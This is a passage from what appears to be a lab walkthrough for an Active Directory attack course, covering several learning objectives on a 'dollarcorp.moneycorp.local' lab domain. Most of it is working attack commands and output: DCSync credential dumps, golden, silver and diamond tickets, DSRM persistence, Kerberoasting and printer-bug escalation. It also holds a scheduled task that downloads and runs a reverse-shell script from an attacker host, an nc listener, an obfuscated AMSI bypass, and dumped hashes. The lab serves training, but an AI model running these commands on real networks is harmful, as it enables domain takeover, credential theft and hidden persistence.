netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.x

# Extract credentials
# Make sure to set up HFS first and host SafetyKatz.exe
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe

# Run this command in the mimikatz session
lsadump::lsa /patch

# Take note of the "Domain :" output
# This is the Domain SID, which will be used often
```

**_Example_**

![](https://i.imgur.com/Wj7mI2N.png)

### **Using the secrets of the krbtgt account, create a Golden ticket.**

- To get the NTLM hash and AES keys of the krbtgt (or any other user's) account, we can use the DCSync attack
- Run the command below from the process running as Domain Admin

```powershell
# Exit mimikatz
exit
exit

# Extract credentials
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

# Important output -:
# Hash NTLM:
# aes256_hmac
# aes128_hmac
```

- We can then use `BetterSafetyKatz.exe` to create a Golden ticket using the **aes256_hmac** key from the last output
- Run the command below from an elevated command prompt
```powershell
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
```

- Now you should be administrator on `dcorp-dc`
- Run `klist` to confirm

![](https://i.imgur.com/LhaskQI.png)

- You should now be able to run commands remotely

```powershell
dir \\dcorp-dc\c$

# Run WMI commands on the DC
powershell
gwmi -Class win32_computersystem -ComputerName dcorp-dc
```

**_Example_**

![](https://i.imgur.com/btWJLpq.png)

### **Getting Command Execution on the domain controller, creating a silver ticket**

> [!bug] **Learning Objective 9**
> - During the additional lab time:
>   - Try to get command execution on the domain controller by creating silver tickets for:
>     - HOST service
>     - WMI
> # Solution -:

### **Step 1 - Craft Silver Ticket (HOST Service)**

- First, extract secrets as shown earlier and note the output down
- Now start `mimikatz.exe`

```powershell
cd \AD\Tools
.\mimikatz.exe
```

- Then run the command below, replacing `/rc4` with the **DCORP-DC$** NTLM hash and `/sid` with the **Domain :** output from the secrets we extracted earlier

```powershell
kerberos::golden /user:Administrator /rc4:f5a2cef076a16742b123b8ed07c372c1 /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /domain:dollarcorp.moneycorp.local /service:HOST /startoffset:0 /endin:600 /renewmax:10080 /ptt

# /sid: - Domain SID
# /rc4: - DCORP-DC$ NTLM hash
```

- Then run the command below to find out if you have permission to view scheduled tasks

```powershell
exit
schtasks /S dcorp-dc.dollarcorp.moneycorp.local

[SNIP]
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
Device Install Group Policy              N/A                    Ready
Device Install Reboot Required           N/A                    Ready
Sysprep Generalize Drivers               N/A                    Ready

Folder: \Microsoft\Windows\Power Efficiency Diagnostics
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
AnalyzeSystem                            N/A                    Ready

Folder: \Microsoft\Windows\PushToInstall
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
LoginCheck                               N/A                    Disabled
Registration                             N/A                    Disabled

Folder: \Microsoft\Windows\Ras
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
MobilityManager                          N/A                    Ready
[SNIP]
```

**Note that if you get "Error: Access is denied", you probably did something wrong**

### **Step 2 - Gain Reverse Shell**

- [ ] **_Create Invoke-PowerShellTcpEx.ps1:_**

- Create a copy of **Invoke-PowerShellTcp.ps1** and rename it to **Invoke-PowerShellTcpEx.ps1**.
- Open **Invoke-PowerShellTcpEx.ps1** in PowerShell ISE
- Add `Power -Reverse -IPAddress 172.16.100.X -Port 443` to the end of the file and save.
![](https://i.imgur.com/4aXmJlD.png)

- Now host the newly created **Invoke-PowerShellTcpEx.ps1** on **HFS**
- Start your reverse shell listener in another new `MS-DOS` session

```powershell
C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443
```

- In the same session where we created our **silver ticket**, run this

```powershell
# Create scheduled task
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "sec-fortress" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/Invoke-PowerShellTcpEx.ps1''')'"

# Start scheduled task
schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "sec-fortress"
```

**_Example_**

![](https://i.imgur.com/2uJ6umQ.png)

> All of this is for `/service:HOST`; now let's also look at `/service:RPCSS`

### **Craft Silver Ticket (WMI Service)**

**For accessing `WMI`, we need to create two tickets - one for the `HOST` service and another for `RPCSS`.**

- Run the commands below from an elevated shell:

```powershell
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:f5a2cef076a16742b123b8ed07c372c1 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

# Then confirm that you have access to scheduled tasks
schtasks /S dcorp-dc.dollarcorp.moneycorp.local
```

- Inject a ticket for `RPCSS`:

```powershell
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:f5a2cef076a16742b123b8ed07c372c1 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
```

- Check that the tickets are present. **_Desired Output -:_**

```powershell
klist
```

![](https://i.imgur.com/IRLpTXp.png)

- Now, try running `WMI` commands on the domain controller:

```powershell
# Spawn Invisi-Shell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# Run a command on the DC
Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc
```

**_Example_**

![](https://i.imgur.com/vDOFHbG.png)

### **Executing the Diamond Ticket attack.**

> [!bug] **Learning Objective 10**
> - Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack.
> # Solution -:

**We can simply use the following `Rubeus` command to execute the attack. Note that the command needs to be run from an elevated shell (Run as administrator):**

```powershell
C:\AD\Tools\Rubeus.exe diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

# krbkey is the same as the krbtgt aes256_hmac key
# You can use the DCSync attack to get this information
# Check out the golden ticket section to know more about it
```

- Access the DC using `winrs` from the newly spawned process!
1433 | 1434 | 1435 | ```powershell 1436 | winrs -r:dcorp-dc cmd 1437 | ``` 1438 | 1439 | 1440 | **_Example_** 1441 | 1442 | 1443 | 1444 | ![](https://i.imgur.com/QexYfSz.png) 1445 | 1446 | 1447 | 1448 | 1449 | ### **Abusing the DSRM credential for persistence.** 1450 | 1451 | 1452 | 1453 | > [!bug] **Learning Objective 11** 1454 | > - During additional lab time: 1455 | > - Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence. 1456 | > # Solution -: 1457 | 1458 | 1459 | 1460 | 1461 | 1462 | **Note that we need Domain Admin privileges to do this, So go ahead and spawn an elevated shell and run this to obtain a new `MS-DOS` session with domain admin privileges** -: 1463 | 1464 | 1465 | ```powershell 1466 | C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt 1467 | ``` 1468 | 1469 | - run the following commands on the new `MS-DOS` session to open a PowerShell remoting session 1470 | 1471 | ```powershell 1472 | # load invisi-shell 1473 | powershell 1474 | cd \AD\Tools 1475 | C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat 1476 | 1477 | # load PS Remoting 1478 | $sess = New-PSSession dcorp-dc 1479 | Enter-PSSession -Session $sess 1480 | 1481 | # load amsi bypass 1482 | S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) 1483 | 1484 | # Exit session 1485 | exit 1486 | ``` 1487 | 1488 | 1489 | 1490 | 1491 | - Load the Invoke-Mimi script in the current session 1492 | 1493 | 1494 | ```powershell 1495 | 
Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimi.ps1 -Session $sess 1496 | ``` 1497 | 1498 | 1499 | 1500 | - Extract credentials from the SAM file from the DC. **The Directory Services Restore Mode** (DSRM) password is mapped to the local **Administrator** on the DC 1501 | 1502 | 1503 | ```powershell 1504 | # Connect to DC 1505 | Enter-PSSession -Session $sess 1506 | 1507 | # Extract Creds 1508 | Invoke-Mimi -Command '"token::elevate" "lsadump::sam"' 1509 | 1510 | # Important Output - 1511 | # User: 1512 | # Hash NTLM: 1513 | ``` 1514 | 1515 | 1516 | - change the logon behavior for the DSRM account 1517 | 1518 | 1519 | ```powershell 1520 | New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD 1521 | 1522 | exit 1523 | ``` 1524 | 1525 | 1526 | - Pass the Hash for the **DSRM** administrator 1527 | 1528 | ```powershell 1529 | . .\Invoke-Mimi.ps1 1530 | 1531 | Invoke-Mimi -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"' 1532 | ``` 1533 | 1534 | - We can now access the `dcorp-dc` directly from the new session. 1535 | 1536 | 1537 | ```powershell 1538 | ls \\dcorp-dc.dollarcorp.moneycorp.local\c$ 1539 | ``` 1540 | 1541 | 1542 | ![](https://i.imgur.com/IRluJRE.png) 1543 | 1544 | 1545 | 1546 | ### **Enumerating Replication (DCSync) rights** 1547 | 1548 | 1549 | > [!bug] **Learning Objective 12** 1550 | > - Check if studentx has Replication (DCSync) rights. 1551 | > - If yes, execute the DCSync attack to pull hashes of the krbtgt user. 1552 | > - If no, add the replication rights for the studentx and execute the DCSync attack to pull hashes of the krbtgt user. 
> # Solution -:

- Check if `studentx` has replication rights (run from an elevated command prompt):

```powershell
# Load invisi-shell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# Load PowerView
. C:\AD\Tools\PowerView.ps1

# Check rights
Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "studentx"}
```

> If you don't get any output, `studentx` doesn't have replication rights; we can go ahead and add them ourselves.

- Start a process as Domain Administrator (run from an elevated command prompt):

```powershell
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

- Run the below commands in the new process. Remember to change `studentx` to your user:

```powershell
# Load invisi-shell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# Load PowerView
. C:\AD\Tools\PowerView.ps1

# Add rights
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity studentx -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
```

![](https://i.imgur.com/ypwVnJz.png)

- Let's check for the rights once again from a normal shell:

```powershell
# Load invisi-shell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# Load PowerView
. C:\AD\Tools\PowerView.ps1

# Check rights
Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "studentx"}
```

- Your output should look like this (the three ACEs are the three replication extended rights that together make up the `DCSync` right):

```powershell
AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-In-Filtered-Set
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-4105
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : dcorp\student505

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-4105
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : dcorp\student505

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-4105
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : dcorp\student505
```

- Sweet! Now the command below (or any similar tool) can be used as `studentx` to get the hashes of the krbtgt user or any other user (run from an elevated command prompt):

```powershell
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
```

> [!bug] **Learning Objective 13**
> - Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access.
> - Retrieve machine account hash from dcorp-dc without using administrator access and use that to execute a Silver Ticket attack to get code execution with WMI.
> # Solution -:

### **PowerShell Remoting and WMI Access via Security Descriptor Modification on dcorp-dc**

**Once we have administrative privileges on a machine, we can modify security descriptors of services to access those services later without administrative privileges. The command below (to be run as Domain Administrator) modifies the host security descriptors for `WMI` on the DC to allow `studentx` access to `WMI`.**

- Start a process as domain admin:

```powershell
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

- In the newly spawned process run this:

```powershell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\RACE.ps1

# Modify security descriptor
Set-RemoteWMI -SamAccountName studentx -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
```

- Now, we can execute `WMI` queries on the DC as `studentx` (spawn a new PowerShell process):

```powershell
powershell

gwmi -class win32_operatingsystem -ComputerName dcorp-dc
```

![](https://i.imgur.com/FmYDwF2.png)

### **Silver Ticket Attack via Machine Account Hash of dcorp-dc**

- Start a process as domain admin:

```powershell
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

- To retrieve the machine account hash without DA later on, we first need to modify permissions on the DC. In the newly spawned process run this -:

```powershell
powershell

. C:\AD\Tools\RACE.ps1

# Modify the security descriptors of the relevant registry keys on the DC
# so that studentx can read the secrets remotely later
Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee studentx -Verbose
```

![](https://i.imgur.com/83LGb7O.png)

- Now, we can retrieve the hash as `studentx` (spawn a new PowerShell process):

```powershell
. C:\AD\Tools\RACE.ps1

Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
```

![](https://i.imgur.com/uHQje6w.png)

**We can then generate Silver Tickets for HOST and RPCSS with the machine account hash, enabling WMI query execution**

```powershell
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:f5a2cef076a16742b123b8ed07c372c1 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
```

```powershell
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:f5a2cef076a16742b123b8ed07c372c1 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
```

- Run the below commands for `WMI` query execution:

```powershell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

gwmi -Class win32_operatingsystem -ComputerName dcorp-dc
```

![](https://i.imgur.com/JU363Qh.png)

# **Domain Privilege Escalation**

> [!bug] Learning Objective 14
> - Using the Kerberoast attack, crack password of a SQL server service account.
> # Solution -:

### **Kerberoast Attack - Crack SQL Server Service Account Password**

- Identify services running under user accounts (whose passwords are far easier to crack than machine account passwords) using `PowerView`:

```powershell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\PowerView.ps1

Get-DomainUser -SPN

# Important output -:
# samaccountname
# serviceprincipalname
```

![](https://i.imgur.com/yi9qbOd.png)

**Neat! `svcadmin`, which is a domain administrator, has an SPN set! Let's Kerberoast it!**

- Retrieve the hash for the `svcadmin` account with `Rubeus`. The `/rc4opsec` flag requests RC4 tickets only for accounts that still support RC4, rather than downgrading AES-enabled accounts (run the command from an elevated prompt):

```powershell
C:\AD\Tools\Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt
```

![](https://i.imgur.com/JHhSzlr.png)

> **You should now have your hashes written to `C:\AD\Tools\hashes.txt`. We can now use John the Ripper to brute-force the hashes. Please note that you need to remove "`:1433`" from the SPN in `hashes.txt` before running John.**

![](https://i.imgur.com/uxUMZQg.png)

- We can then run the below command after making the above change -:

```powershell
C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt
```

![](https://i.imgur.com/VsPwFaB.png)

> [!bug] Learning Objective 15
> - Find a server in the dcorp domain where Unconstrained Delegation is enabled.
> - Compromise the server and escalate to Domain Admin privileges.
> - Escalate to Enterprise Admins privileges by abusing Printer Bug!
> # Solution -:

### **Locate `dcorp` Domain Server with Unconstrained Delegation Enabled**

- Find servers with unconstrained delegation:

```powershell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\PowerView.ps1

Get-DomainComputer -Unconstrained | select -ExpandProperty name
```

![](https://i.imgur.com/X1AveOc.png)

> **Since the prerequisite for elevation using Unconstrained Delegation is having admin access to the machine, we need to compromise a user who has local admin access on `dcorp-appsrv`. Recall that we extracted the secrets of `appadmin`, `srvadmin` and `websvc` from `dcorp-adminsrv`. Let's check if any of them has local admin privileges on `dcorp-appsrv`.**

- First, we will try with `appadmin`. Run the below command from an elevated command prompt -:

```powershell
C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth /user:appadmin /domain:dollarcorp.moneycorp.local /aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /run:cmd.exe" "exit"
```

- Run the below commands in the new process:

```powershell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1

Find-PSRemotingLocalAdminAccess
```

![](https://i.imgur.com/vsiDSok.png)

### **Exploit Printer Bug for Escalation to Enterprise Admins Privileges**

- Run the below command from the new process running as `appadmin` -:

```powershell
echo F | xcopy C:\AD\Tools\Rubeus.exe \\dcorp-appsrv\C$\Users\Public\Rubeus.exe /Y
```

![](https://i.imgur.com/6ZZeoLg.png)

- Run `Rubeus` in listener mode on `dcorp-appsrv`:

```powershell
winrs -r:dcorp-appsrv cmd

C:\Users\Public\Rubeus.exe monitor /targetuser:DCORP-DC$ /interval:5 /nowrap
```

- Force authentication from `dcorp-dc$` to `dcorp-appsrv` using MS-RPRN (make sure to start a new process on your student VM for this):

```powershell
C:\AD\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local
```

![](https://i.imgur.com/IKPDwpG.png)

- On the `Rubeus` listener, we can see the TGT of `dcorp-dc$` (output):

```
# Important output
# User :
# Base64EncodedTicket :

[*] Monitoring every 5 seconds for new TGTs

[*] 12/18/2023 9:34:26 PM UTC - Found new TGT:

User : DCORP-DC$@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 12/18/2023 5:51:15 AM
EndTime : 12/18/2023 3:51:15 PM
RenewTill : 12/24/2023 8:17:13 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :

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

[*] Ticket cache size: 1
```

![](https://i.imgur.com/xfekzWb.png)

- Copy the base64 encoded ticket and inject it with `Rubeus` on the student VM, so that `SafetyKatz` can run DCSync from that process (run the below command from an elevated prompt) -:

```powershell
# C:\AD\Tools\Rubeus.exe ptt /ticket:
# Example -:

C:\AD\Tools\Rubeus.exe ptt /ticket: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
```

![](https://i.imgur.com/BT3kcjj.png)

- Now, we can run `DCSync` from this process:

```powershell
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
```

### **Escalation to Enterprise Admins**

- To get Enterprise Admin privileges, we need to force authentication from `mcorp-dc`. Run the below command to listen for `mcorp-dc$` tickets on `dcorp-appsrv`:

```powershell
winrs -r:dcorp-appsrv cmd

C:\Users\Public\Rubeus.exe monitor /targetuser:MCORP-DC$ /interval:5 /nowrap
```

> **Note -:** In case you get "access is denied", you are probably running in the wrong shell: terminate the `Rubeus` listener we created earlier and run this from that process (the one running as `appadmin`).

![](https://i.imgur.com/NhLQfn8.png)

- Use `MS-RPRN` on the student VM to trigger authentication from `mcorp-dc` to `dcorp-appsrv`:

```powershell
C:\AD\Tools\MS-RPRN.exe \\mcorp-dc.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local

# Expected output -
RpcRemoteFindFirstPrinterChangeNotificationEx failed.Error Code 1722 - The RPC server is unavailable.
```

- Now check your `Rubeus` output and you should see the **Base64EncodedTicket**.
- Inject the base64 encoded ticket with `Rubeus` on the student VM and run the `SafetyKatz` DCSync command from that process (run the below command from an elevated shell):

```powershell
# C:\AD\Tools\Rubeus.exe ptt /ticket:
# Example -:

C:\AD\Tools\Rubeus.exe ptt /ticket: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
```

- Now, we can run the DCSync attack from this process:

```powershell
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"
```

**Awesome! We escalated to Enterprise Admins too!**

***

> [!bug] Learning Objective 16
> - Enumerate users in the domain for whom Constrained Delegation is enabled.
> - For such a user, request a TGT from the DC and obtain a TGS for the service to which delegation is configured.
> - Pass the ticket and access the service.
> - Enumerate computer accounts in the domain for which Constrained Delegation is enabled.
> - For such a user, request a TGT from the DC.
> - Use the TGS for executing the DCSync attack.
> # Solution -:

### **Task 1**

- Enumerate users with constrained delegation -:

```powershell
# Load PowerView
. C:\AD\Tools\PowerView.ps1

Get-DomainUser -TrustedToAuth
```

![](https://i.imgur.com/eznsBTk.png)

> [!todo] Check that the `TRUSTED_TO_AUTH_FOR_DELEGATION` flag is also set in the **useraccountcontrol** property; it is what allows the account to obtain a service ticket for any user without that user's credentials (protocol transition)

> [!info] We already have the secrets of `websvc` from the `dcorp-adminsrv` machine (check your bookmarks to see how to do that). We can use either `Kekeo` or `Rubeus` to abuse that.
**Abuse Constrained Delegation using `websvc` with `Rubeus`**

Request a **TGS** for '`websvc`' as Domain Administrator ('**Administrator**') and use it to access the file system on `dcorp-mssql`:

```powershell
C:\AD\Tools\Rubeus.exe s4u /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt
```

- Check if the ticket was injected successfully:

```powershell
klist
```

![](https://i.imgur.com/TqM14GA.png)

- Try accessing the file system on `dcorp-mssql`:

```powershell
dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$
```

![](https://i.imgur.com/WnEumFU.png)

> [!important] In case you want to use `kekeo` instead of `rubeus`, check "**Abuse Constrained Delegation using websvc with Kekeo**" in the lab manual

### **Task 2**

For the **next task**, enumerate the computer accounts with constrained delegation enabled using `PowerView` -:

```powershell
# Load PowerView
. C:\AD\Tools\PowerView.ps1

Get-DomainComputer -TrustedToAuth
```

![](https://i.imgur.com/jYyiptn.png)

**Abuse Constrained Delegation using dcorp-adminsrv with `Rubeus`**

Run the following command from an elevated command prompt to use the obtained AES keys of `dcorp-adminsrv$` for `SafetyKatz` DCSync. `dcorp-adminsrv$` is only allowed to delegate to the `time` service on `dcorp-dc`, but the service class in a service ticket is not protected, so `/altservice:ldap` yields an LDAP ticket for the DC:

```powershell
C:\AD\Tools\Rubeus.exe s4u /user:dcorp-adminsrv$ /aes256:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51 /impersonateuser:Administrator /msdsspn:time/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:ldap /ptt
```

> [!summary] In case you want to extract creds (secrets), for instance the **AES keys**, check your bookmarks on how to do that

- Run the below command to abuse the LDAP ticket (perform the `DCSync` attack):

```powershell
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
```

**_Output -:_**

```Output
** SAM ACCOUNT **

SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 9:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502

Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80
```

> [!important] In case you want to use `kekeo` instead of `rubeus`, check "**Abuse Constrained Delegation using dcorp-adminsrv with Kekeo**" in the lab manual

> [!bug] **Learning Objective 17**
> - Find a computer object in dcorp domain where we have Write permissions.
> - Abuse the Write permissions to access that computer as Domain Admin.
> # Solution -:

- Start up a PowerShell session using **Invisi-Shell**
- Enumerate Write permissions for a user that we have compromised -:

```powershell
# Load invisi-shell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# Load PowerView (Find-InterestingDomainACL comes from it)
. C:\AD\Tools\PowerView.ps1

# Enum writes for all users
Find-InterestingDomainACL | select IdentityReferenceName, ActiveDirectoryRights

# Enum writes for a specific user
Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'}

# Note that the most important value in 'ActiveDirectoryRights'
# is 'GenericWrite'; this is what we are looking for
```

![](https://i.imgur.com/y2OEHoP.png)

> [!hint] After trying from multiple users or using BloodHound we would know that the user `ciadmin` has Write permissions on the computer object of `dcorp-mgmt` (the Jenkins instance)

![](https://i.imgur.com/6rB9mxo.png)

- Let's use the reverse shell that we have and load `PowerView` there
- Go ahead and get a reverse shell as `ciadmin` with the **Jenkins** instance
- Make sure to host `sbloggingbypass.txt` on **HFS**

```powershell
PS C:\Users\Administrator\.jenkins\workspace\Projectx> iex (iwr http://172.16.100.X/sbloggingbypass.txt -UseBasicParsing)
```

- Load the AMSI bypass

```powershell
